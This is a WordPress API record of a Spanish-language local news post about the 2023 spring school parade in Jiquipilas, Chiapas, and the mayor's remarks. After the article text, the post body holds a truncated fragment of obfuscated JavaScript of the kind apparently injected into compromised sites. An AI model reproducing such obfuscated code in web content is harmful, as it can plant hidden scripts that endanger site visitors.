{"id":9117,"date":"2023-03-23T04:27:52","date_gmt":"2023-03-23T04:27:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9117"},"modified":"2023-03-23T04:27:52","modified_gmt":"2023-03-23T04:27:52","slug":"hugo-lazaro-presencio-espectacular-desfile-de-la-primavera-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9117","title":{"rendered":"Hugo L\u00e1zaro presenci\u00f3 espectacular desfile de La Primavera 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230322-WA0020-1024x461.jpg\" alt=\"\" class=\"wp-image-9118\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230322-WA0020-1024x461.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230322-WA0020-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230322-WA0020-768x346.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230322-WA0020.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Junto a su esposa Madely Montejo Maza, reconoci\u00f3 a los alumnos de las escuelas participantes. <\/p>\n\n\n\n<p>\u2022 Agradeci\u00f3 a los representantes del Ayuntamiento de Ocozocoautla y Chiapa de Corzo por su participaci\u00f3n en este magno desfile. <\/p>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 Con un lleno total en el domo de la ejidal, trajes de distintos colores y dise\u00f1os muy creativos, adem\u00e1s de una alegr\u00eda desbordada de alumnos de todos los niveles educativos, as\u00ed fue el tradicional desfile de La Primavera 2023, el cual recibi\u00f3 el reconocimiento del Presidente Municipal Hugo L\u00e1zaro Rodr\u00edguez.Las calles de Jiquipilas lucieron llenas de algarab\u00eda al paso de casi 20 contingentes entre jardines de ni\u00f1os, escuelas primarias, secundarias, preparatoria, grupos de Zumba, Carnaval zoque coiteco, batucadas y m\u00fasica tradicional chiapaneca, adem\u00e1s de Monta de Judas y Viejos Pascuas.\u201cEstamos muy contentos por compartir la felicidad de los participantes en este desfile de la Primavera, en el cual nos demuestra que es una de las estaciones del a\u00f1o donde predomina la alegr\u00eda, el color, la energ\u00eda y el florecer de la naturaleza\u201d, dijo L\u00e1zaro Rodr\u00edguez.Junto a su esposa Madely Montejo Maza, regidores y funcionarios del Ayuntamiento, Hugo L\u00e1zaro reconoci\u00f3 p\u00fablicamente la participaci\u00f3n de todos los planteles escolares de Jiquipilas por el talento demostrado en este evento.De manera especial, agradeci\u00f3 personalmente la presencia de los invitados a este bonito evento, como Alejandra Nuricumbo S\u00e1nchez y Mar\u00eda Fernanda Dom\u00ednguez Ruiz regidoras del Ayuntamiento de Chiapa de Corzo, Nayeli del Carmen Chanona Chanona Directora de Arte y Cultura de Ocozocoautla y Ezequiel Valencia P\u00e9rez Comisariado Ejidal de Jiquipilas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Junto a su esposa Madely Montejo Maza, reconoci\u00f3 a los alumnos de las escuelas participantes. \u2022 Agradeci\u00f3 a los representantes del Ayuntamiento de Ocozocoautla y Chiapa de Corzo por su participaci\u00f3n en este magno desfile. Jiquipilas, Chiapas. \u2013 Con un lleno total en el domo de la ejidal, trajes de distintos colores y dise\u00f1os &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9118,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9117","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9117"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9117\/revisions"}],"predecessor-version":[{"id":9119,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9117\/revisions\/9119"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9118"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}